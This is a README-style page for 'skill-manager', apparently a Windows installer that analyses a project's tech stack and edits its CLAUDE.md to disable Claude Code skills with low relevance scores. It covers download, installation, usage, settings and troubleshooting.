⚙️ skill-manager - Manage Skills Efficiently by Project

Download skill-manager

📋 What is skill-manager?

skill-manager helps you save tokens during your conversations by turning off AI skills that don't apply to your current project. It looks at your project's tech stack, rates how useful each skill is, and updates your CLAUDE.md file automatically. This way, your AI assistant focuses only on what matters.

It's designed for developers and teams using Claude Code who want to keep their interactions lean and efficient.

💻 System Requirements

skill-manager runs on Windows systems. Below are the minimum requirements:

  • Windows 10 or newer (64-bit recommended)
  • 4 GB RAM or more
  • 100 MB free disk space
  • Internet connection for downloading updates

No need to install extra software or tools.

🚀 Getting Started

Before you start, make sure you have access to the internet for downloading the app and that your computer meets the system requirements.

Step 1: Download skill-manager

Click the big badge at the top or visit the releases page here:

Download skill-manager

This link takes you to the official release page on GitHub. You will find the latest version ready for download.

Step 2: Find the right file to download

On the release page, look for a file that suits Windows. It will usually end with .exe. For example, a file might be named skill-manager-setup.exe or similar.

Click on the file name to start downloading it to your computer.

Step 3: Run the installer

Once the download is complete:

  • Open your Downloads folder.
  • Double-click the .exe file you downloaded.
  • A setup window will open to guide you through installation.

Follow the prompts on each screen. It will ask for installation location and permissions. Let it complete installing.

Step 4: Launch skill-manager

After installation:

  • Look for the skill-manager icon on your desktop or in the Start menu.
  • Double-click it to open the program.

You will see the main interface. It may ask you to load a project folder.

🛠 How to use skill-manager

skill-manager works by analyzing the tech stack of your project. It then decides which Claude Code skills to enable or disable. Here is how to start using it step-by-step.

  1. Open your project folder
Click the "Open Project" button. Use the file picker to select the folder where your project files are located.

  2. Analyze your project
Click "Analyze." skill-manager scans your project to detect what programming languages, frameworks, or tools you are using.

  3. View skill relevance scores
skill-manager shows a list of Claude Code skills with scores indicating how relevant each skill is to your project.

  4. Auto-disable irrelevant skills
Click "Apply Recommendations" to disable skills that have low relevance. This reduces unnecessary token usage during conversations.

  5. Check the updated CLAUDE.md file
skill-manager injects changes into your CLAUDE.md file. This file tells your AI which skills to turn on or off per your project.

🔄 Updating skill-manager

To get the latest improvements:

  • Visit the releases page.
  • Download the newest .exe installation file.
  • Run the installer again to replace the old version with the new one.

Settings and project data will stay intact during updates.

⚙️ Settings and Preferences

skill-manager includes options to customize how it works:

  • Scan Depth: Choose how deeply the program looks into your project files.
  • Auto-Update CLAUDE.md: Turn this on or off to let skill-manager change your CLAUDE.md automatically.
  • Notification Settings: Control the types of alerts you receive after analysis or skill changes.

Find these under "Settings" in the main menu.

🔧 Troubleshooting

If you run into issues, try these steps:

  • Make sure you downloaded the Windows installer .exe from the official releases page.
  • Restart the application after installation.
  • Close other programs that may use significant memory.
  • Verify your project folder contains code files supported by skill-manager.
  • Check that your Windows is up to date.

If the problem continues, open an issue on the GitHub repository for help.
